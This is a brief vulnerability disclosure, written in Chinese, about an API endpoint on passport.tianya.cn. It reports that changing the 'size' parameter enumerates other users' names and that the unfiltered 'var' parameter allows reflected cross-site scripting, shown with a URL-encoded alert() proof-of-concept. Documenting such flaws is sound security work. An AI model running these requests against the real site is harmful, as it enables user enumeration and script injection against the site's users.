http://passport.tianya.cn/topapi/newActiveUsers.do?size=54&var=
其中size=未加密,替换,可查询到其他的用户名
http://passport.tianya.cn/topapi/newActiveUsers.do?size=55&var=
其中VAR参数未过滤,导致触发XSS
http://passport.tianya.cn/topapi/newActiveUsers.do?size=55&var=%3Cscript%3Ealert%28/xss/%29%3C/script%3E